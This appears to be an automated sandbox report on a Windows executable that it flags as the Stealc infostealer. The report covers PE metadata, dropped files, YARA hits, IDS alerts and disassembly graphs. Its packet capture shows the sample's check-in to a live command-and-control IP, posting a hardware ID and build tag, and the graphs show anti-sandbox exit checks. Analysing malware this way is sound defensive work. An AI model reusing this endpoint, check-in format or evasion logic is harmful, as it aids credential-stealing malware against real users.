                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.3.6.<./.P.i.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4B3.tmp.xml

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4579
                                            Entropy (8bit):4.471732731551321
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zs0AiJg77aI9NyWpW8VYcsYm8M4JnyEF1+q86OmWixKEd:uIjf0AwI77T7VHJy8SmdxKEd
                                            MD5:66FE51B764CA53EC0EFFE9F1FE0337B3
                                            SHA1:1D50B5F486D97B19E0BC9418C880A8064DDEF475
                                            SHA-256:398E197901475E311E317118799CA27F2FA6FFF41C52EEF5CE972626990453C2
                                            SHA-512:03E9FA52A03C8F4E0D693A217656B0FA1DBAACC501D2328D809192975AA0547F7F60C59C4E7B752817A53A8F7D13A5E5817447BBA7D2058C08F39A546E2F04F5
                                            Malicious:false
                                            Reputation:low
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="569266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                            C:\Windows\appcompat\Programs\Amcache.hve

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.42155792569965
                                            Encrypted:false
                                            SSDEEP:6144:kSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNo0uhiTw:vvloTMW+EZMM6DFyK03w
                                            MD5:F3551C273258A2C306551F7370EC36C3
                                            SHA1:A2469E4F444FB0683A94E6A5FD0344438292CC92
                                            SHA-256:3B5831B8BC5F0B77119B85C014245C18EE5AFEB5F1161CE343E493FC97B1EFEA
                                            SHA-512:9A3B1250F748B9BCAC71D70DCDA996FFEFF4FE52B44E492BF17BB8ABA13732F123D1BF403E1672C0AE76426B0E1303DA84CE4EB39F9B3C12C1C7584E6E51BDF1
                                            Malicious:false
                                            Reputation:low
                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv.C},.................................................................................................................................................................................................................................................................................................................................................w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.55271434359143
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:lxEu3xfjIb.exe
                                            File size:649'728 bytes
                                            MD5:bb99cde9173ee6e21b61963f6a4a60da
                                            SHA1:2bcff0eba69c4592e4d2959e8a2e35fc35416338
                                            SHA256:c40ada473bd3a23569dd60807fa9754f2917c029e28746e7c1a32568d801dbfe
                                            SHA512:751fe655c94c9fd218e6e51b7a4c36f88b4aec925fd76ec2093796752f05fc4fcc6d9dc840fc35e4d13fdd7fc24aab775798f06b18e311e8d615327612df5620
                                            SSDEEP:12288:WDmwmgSvGScINm25Vzup9YL59eROPByNS6c3fA46Kk:omfgSvwMkQCO8Y6OfA46Kk
                                            TLSH:4ED4F120B6F19C36F7F756309934A5C45FFBF963A971819E221C265E1E322A08EE4713
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W}..6.Z.6.Z.6.Z4y.Z.6.Z.d.Z.6.Z.d.Z.6.Z.d.Z.6.Z..hZ.6.Z.6.Z.6.Z.d.Z.6.Z.d.Z.6.Z.d.Z.6.ZRich.6.Z........PE..L......e...........

                                            File Icon

                                            Icon Hash:738733b18bab8be0

                                            Static PE Info

                                            General

                                            Entrypoint:0x4017d7
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x65C088D1 [Mon Feb 5 07:05:53 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:9ed146f7c8ff1a04625e34c1f119649c

                                            Entrypoint Preview

                                            Instruction
                                            call 00007FD71CE748C3h
                                            jmp 00007FD71CE70D4Dh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000328h
                                            mov dword ptr [0048C798h], eax
                                            mov dword ptr [0048C794h], ecx
                                            mov dword ptr [0048C790h], edx
                                            mov dword ptr [0048C78Ch], ebx
                                            mov dword ptr [0048C788h], esi
                                            mov dword ptr [0048C784h], edi
                                            mov word ptr [0048C7B0h], ss
                                            mov word ptr [0048C7A4h], cs
                                            mov word ptr [0048C780h], ds
                                            mov word ptr [0048C77Ch], es
                                            mov word ptr [0048C778h], fs
                                            mov word ptr [0048C774h], gs
                                            pushfd
                                            pop dword ptr [0048C7A8h]
                                            mov eax, dword ptr [ebp+00h]
                                            mov dword ptr [0048C79Ch], eax
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [0048C7A0h], eax
                                            lea eax, dword ptr [ebp+08h]
                                            mov dword ptr [0048C7ACh], eax
                                            mov eax, dword ptr [ebp-00000320h]
                                            mov dword ptr [0048C6E8h], 00010001h
                                            mov eax, dword ptr [0048C7A0h]
                                            mov dword ptr [0048C69Ch], eax
                                            mov dword ptr [0048C690h], C0000409h
                                            mov dword ptr [0048C694h], 00000001h
                                            mov eax, dword ptr [0048B004h]
                                            mov dword ptr [ebp-00000328h], eax
                                            mov eax, dword ptr [0048B008h]
                                            mov dword ptr [ebp-00000324h], eax
                                            call dword ptr [000000ECh]

                                            Rich Headers

                                            Programming Language:
                                            • [C++] VS2008 build 21022
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8994c0x28.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x27910000x10bc8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x880000x1a0.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x868bc0x86a00f327d8fd11f9d291a192cf424d58b261False0.9234962569637883data7.84625610084164IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x880000x22ce0x2400c590705db7e604ce530136ad6100d294False0.3568793402777778data5.452585743934992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x8b0000x27053980x4c005c4577ebe96d0ed3fff76ebd735f345dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x27910000x10bc80x10c0025a81e3336dc5562d2b40e287683b7d7False0.44891266324626866DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2658455991569831745807614120560689152.000000, slope 10676176172832952127534461336334368768.0000005.022819364958824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            JUPILAMADUSAGIGIXOYANEXUF0x279bd480x3faASCII text, with very long lines (1018), with no line terminatorsTurkishTurkey0.6237721021611002
                                            KIZEWEJAJUDIM0x279b1500xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6010447273914463
                                            RT_ICON0x27917500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3296908315565032
                                            RT_ICON0x27925f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5112815884476535
                                            RT_ICON0x2792ea00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5506912442396313
                                            RT_ICON0x27935680x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5845375722543352
                                            RT_ICON0x2793ad00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4220954356846473
                                            RT_ICON0x27960780x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4979508196721312
                                            RT_ICON0x2796a000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.500886524822695
                                            RT_ICON0x2796ed00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.38646055437100213
                                            RT_ICON0x2797d780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5392599277978339
                                            RT_ICON0x27986200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                            RT_ICON0x2798ce80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6380057803468208
                                            RT_ICON0x27992500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.40126641651031897
                                            RT_ICON0x279a2f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39344262295081966
                                            RT_ICON0x279ac800x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4370567375886525
                                            RT_STRING0x279c2f00x144data0.5216049382716049
                                            RT_STRING0x279c4380x850AmigaOS bitmap font "e", fc_YSize 26880, 20480 elements, 2nd "i", 3rd "v"0.4149436090225564
                                            RT_STRING0x279cc880x3e0data0.4637096774193548
                                            RT_STRING0x279d0680x31edata0.4799498746867168
                                            RT_STRING0x279d3880x598data0.4483240223463687
                                            RT_STRING0x279d9200x680data0.4387019230769231
                                            RT_STRING0x279dfa00x5eadata0.43593130779392336
                                            RT_STRING0x279e5900x7f0data0.4237204724409449
                                            RT_STRING0x279ed800x69cdata0.43498817966903075
                                            RT_STRING0x279f4200x6f0data0.42849099099099097
                                            RT_STRING0x279fb100x5e6data0.44437086092715233
                                            RT_STRING0x27a00f80x7ecdata0.4176528599605523
                                            RT_STRING0x27a08e80x60cdata0.43733850129198965
                                            RT_STRING0x27a0ef80x680data0.43209134615384615
                                            RT_STRING0x27a15780x64cdata0.4280397022332506
                                            RT_GROUP_ICON0x2796e680x68dataTurkishTurkey0.7115384615384616
                                            RT_GROUP_ICON0x279b0e80x68dataTurkishTurkey0.7115384615384616
                                            RT_VERSION0x279c1480x1a4data0.5785714285714286

                                            Imports

                                            DLLImport
                                            KERNEL32.dllSetProcessAffinityMask, SetDefaultCommConfigA, GetNumaProcessorNode, GetLocaleInfoA, DebugActiveProcessStop, CallNamedPipeA, InterlockedIncrement, MoveFileExW, GlobalSize, GetEnvironmentStringsW, Process32First, GlobalLock, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, GlobalAlloc, GetSystemWow64DirectoryW, GetConsoleAliasExesLengthW, GetStringTypeExW, HeapCreate, GetTimeFormatW, GetConsoleAliasW, SetConsoleCursorPosition, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetACP, GetStartupInfoA, GetStdHandle, GetLogicalDriveStringsA, SetLastError, GetProcAddress, SetVolumeLabelW, MoveFileW, VirtualAllocEx, BuildCommDCBW, LoadLibraryA, InterlockedExchangeAdd, OpenWaitableTimerW, SetCommMask, FindAtomA, SetNamedPipeHandleState, GetModuleHandleA, OpenFileMappingW, GetVersionExA, ReadConsoleOutputCharacterW, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, HeapSize, ExitProcess, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapFree, VirtualAlloc, WriteFile, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            TurkishTurkey

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-01T17:44:05.331408+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970495.215.207.17680TCP
                                            2024-11-01T17:44:19.423355+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549720TCP
                                            2024-11-01T17:44:47.675345+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.559725TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 1, 2024 17:44:04.262813091 CET4970480192.168.2.595.215.207.176
                                            Nov 1, 2024 17:44:04.267788887 CET804970495.215.207.176192.168.2.5
                                            Nov 1, 2024 17:44:04.267863989 CET4970480192.168.2.595.215.207.176
                                            Nov 1, 2024 17:44:04.270138025 CET4970480192.168.2.595.215.207.176
                                            Nov 1, 2024 17:44:04.275166988 CET804970495.215.207.176192.168.2.5
                                            Nov 1, 2024 17:44:05.085376024 CET804970495.215.207.176192.168.2.5
                                            Nov 1, 2024 17:44:05.085438013 CET4970480192.168.2.595.215.207.176
                                            Nov 1, 2024 17:44:05.091948986 CET4970480192.168.2.595.215.207.176
                                            Nov 1, 2024 17:44:05.098052979 CET804970495.215.207.176192.168.2.5
                                            Nov 1, 2024 17:44:05.331342936 CET804970495.215.207.176192.168.2.5
                                            Nov 1, 2024 17:44:05.331408024 CET4970480192.168.2.595.215.207.176
                                            Nov 1, 2024 17:44:10.447249889 CET804970495.215.207.176192.168.2.5
                                            Nov 1, 2024 17:44:10.447340965 CET4970480192.168.2.595.215.207.176
                                            Nov 1, 2024 17:44:25.352612972 CET4970480192.168.2.595.215.207.176

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 1, 2024 17:44:45.834628105 CET5350290162.159.36.2192.168.2.5
                                            Nov 1, 2024 17:44:46.559715033 CET53585451.1.1.1192.168.2.5

                                            HTTP Request Dependency Graph

                                            • 95.215.207.176

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.54970495.215.207.176801436C:\Users\user\Desktop\lxEu3xfjIb.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 1, 2024 17:44:04.270138025 CET89OUTGET / HTTP/1.1
                                            Host: 95.215.207.176
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Nov 1, 2024 17:44:05.085376024 CET203INHTTP/1.1 200 OK
                                            Date: Fri, 01 Nov 2024 16:44:04 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Nov 1, 2024 17:44:05.091948986 CET417OUTPOST /d8ddb681db736e16.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
                                            Host: 95.215.207.176
                                            Content-Length: 216
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 33 30 45 44 38 43 45 33 42 33 34 37 36 35 32 32 35 30 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a
                                            Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="hwid"5130ED8CE3B3476522507------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="build"LogsDiller------BGDAAKJJDAAKFHJKJKFC--
                                            Nov 1, 2024 17:44:05.331342936 CET210INHTTP/1.1 200 OK
                                            Date: Fri, 01 Nov 2024 16:44:05 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 8
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                            Data Ascii: YmxvY2s=


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:12:43:59
                                            Start date:01/11/2024
                                            Path:C:\Users\user\Desktop\lxEu3xfjIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\lxEu3xfjIb.exe"
                                            Imagebase:0x400000
                                            File size:649'728 bytes
                                            MD5 hash:BB99CDE9173EE6E21B61963F6A4A60DA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:12:44:05
                                            Start date:01/11/2024
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052
                                            Imagebase:0xc10000
                                            File size:483'680 bytes
                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.1%
                                              Dynamic/Decrypted Code Coverage:2.1%
                                              Signature Coverage:13.1%
                                              Total number of Nodes:1355
                                              Total number of Limit Nodes:27
                                              execution_graph 45880 401190 45887 417a70 GetProcessHeap HeapAlloc GetComputerNameA 45880->45887 45882 40119e 45883 4011cc 45882->45883 45889 4179e0 GetProcessHeap HeapAlloc GetUserNameA 45882->45889 45885 4011b7 45885->45883 45886 4011c4 ExitProcess 45885->45886 45888 417ac9 45887->45888 45888->45882 45890 417a53 45889->45890 45890->45885 45891 416c90 45934 4022a0 45891->45934 45908 4179e0 3 API calls 45909 416cd0 45908->45909 45910 417a70 3 API calls 45909->45910 45911 416ce3 45910->45911 46067 41acc0 45911->46067 45913 416d04 45914 41acc0 4 API calls 45913->45914 45915 416d0b 45914->45915 45916 41acc0 4 API calls 45915->45916 45917 416d12 45916->45917 45918 41acc0 4 API calls 45917->45918 45919 416d19 45918->45919 45920 41acc0 4 API calls 45919->45920 45921 416d20 45920->45921 46075 41abb0 45921->46075 45923 416dac 46079 416bc0 GetSystemTime 45923->46079 45924 416d29 45924->45923 45926 416d62 OpenEventA 45924->45926 45928 416d95 CloseHandle Sleep 45926->45928 45929 416d79 45926->45929 45931 416daa 45928->45931 45933 416d81 CreateEventA 45929->45933 45931->45924 45932 416db6 CloseHandle ExitProcess 45933->45923 46276 404610 17 API calls 45934->46276 45936 4022b4 45937 404610 34 API calls 45936->45937 45938 4022cd 45937->45938 45939 404610 34 API calls 45938->45939 45940 4022e6 45939->45940 45941 404610 34 API calls 45940->45941 45942 4022ff 45941->45942 45943 404610 34 API calls 45942->45943 45944 402318 45943->45944 45945 404610 34 API calls 45944->45945 45946 402331 45945->45946 45947 404610 34 API calls 45946->45947 45948 40234a 45947->45948 45949 404610 34 API calls 45948->45949 45950 402363 45949->45950 45951 404610 34 API calls 45950->45951 45952 40237c 45951->45952 45953 404610 34 API calls 45952->45953 45954 402395 45953->45954 45955 404610 34 API calls 45954->45955 45956 4023ae 45955->45956 45957 404610 34 API calls 45956->45957 45958 4023c7 45957->45958 45959 404610 34 API calls 45958->45959 45960 4023e0 45959->45960 45961 404610 34 API calls 45960->45961 45962 4023f9 45961->45962 45963 404610 34 API calls 45962->45963 45964 402412 45963->45964 45965 404610 34 API calls 45964->45965 45966 40242b 45965->45966 45967 404610 34 API calls 45966->45967 45968 402444 45967->45968 45969 404610 34 API calls 45968->45969 45970 40245d 45969->45970 45971 404610 34 API calls 45970->45971 45972 402476 45971->45972 45973 404610 34 API calls 45972->45973 45974 40248f 45973->45974 45975 404610 34 API calls 45974->45975 45976 4024a8 45975->45976 45977 404610 34 API calls 45976->45977 45978 4024c1 45977->45978 45979 404610 34 API calls 45978->45979 45980 4024da 45979->45980 45981 404610 34 API calls 45980->45981 45982 4024f3 45981->45982 45983 404610 34 API calls 45982->45983 45984 40250c 45983->45984 45985 404610 34 API calls 45984->45985 45986 402525 45985->45986 45987 404610 34 API calls 45986->45987 45988 40253e 45987->45988 45989 404610 34 API calls 45988->45989 45990 402557 45989->45990 45991 404610 34 API calls 45990->45991 45992 402570 45991->45992 45993 404610 34 API calls 45992->45993 45994 402589 45993->45994 45995 404610 34 API calls 45994->45995 45996 4025a2 45995->45996 45997 404610 34 API calls 45996->45997 45998 4025bb 45997->45998 45999 404610 34 API calls 45998->45999 46000 4025d4 45999->46000 46001 404610 34 API calls 46000->46001 46002 4025ed 46001->46002 46003 404610 34 API calls 46002->46003 46004 402606 46003->46004 46005 404610 34 API calls 46004->46005 46006 40261f 46005->46006 46007 404610 34 API calls 46006->46007 46008 402638 46007->46008 46009 404610 34 API calls 46008->46009 46010 402651 46009->46010 46011 404610 34 API calls 46010->46011 46012 40266a 46011->46012 46013 404610 34 API calls 46012->46013 46014 402683 46013->46014 46015 404610 34 API calls 46014->46015 46016 40269c 46015->46016 46017 404610 34 API calls 46016->46017 46018 4026b5 46017->46018 46019 404610 34 API calls 46018->46019 46020 4026ce 46019->46020 46021 419bb0 46020->46021 46280 419aa0 GetPEB 46021->46280 46023 419bb8 46024 419de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 46023->46024 46025 419bca 46023->46025 46026 419e44 GetProcAddress 46024->46026 46027 419e5d 46024->46027 46028 419bdc 21 API calls 46025->46028 46026->46027 46029 419e96 46027->46029 46030 419e66 GetProcAddress GetProcAddress 46027->46030 46028->46024 46031 419eb8 46029->46031 46032 419e9f GetProcAddress 46029->46032 46030->46029 46033 419ec1 GetProcAddress 46031->46033 46034 419ed9 46031->46034 46032->46031 46033->46034 46035 416ca0 46034->46035 46036 419ee2 GetProcAddress GetProcAddress 46034->46036 46037 41aa50 46035->46037 46036->46035 46038 41aa60 46037->46038 46039 416cad 46038->46039 46040 41aa8e lstrcpy 46038->46040 46041 4011d0 46039->46041 46040->46039 46042 4011e8 46041->46042 46043 401217 46042->46043 46044 40120f ExitProcess 46042->46044 46045 401160 GetSystemInfo 46043->46045 46046 401184 46045->46046 46047 40117c ExitProcess 46045->46047 46048 401110 GetCurrentProcess VirtualAllocExNuma 46046->46048 46049 401141 ExitProcess 46048->46049 46050 401149 46048->46050 46281 4010a0 VirtualAlloc 46050->46281 46053 401220 46285 418b40 46053->46285 46056 401249 __aulldiv 46057 40129a 46056->46057 46058 401292 ExitProcess 46056->46058 46059 416a10 GetUserDefaultLangID 46057->46059 46060 416a73 GetUserDefaultLCID 46059->46060 46061 416a32 46059->46061 46060->45908 46061->46060 46062 416a61 ExitProcess 46061->46062 46063 416a43 ExitProcess 46061->46063 46064 416a57 ExitProcess 46061->46064 46065 416a6b ExitProcess 46061->46065 46066 416a4d ExitProcess 46061->46066 46065->46060 46287 41aa20 46067->46287 46069 41acd1 lstrlenA 46070 41acf0 46069->46070 46071 41ad28 46070->46071 46073 41ad0a lstrcpy lstrcatA 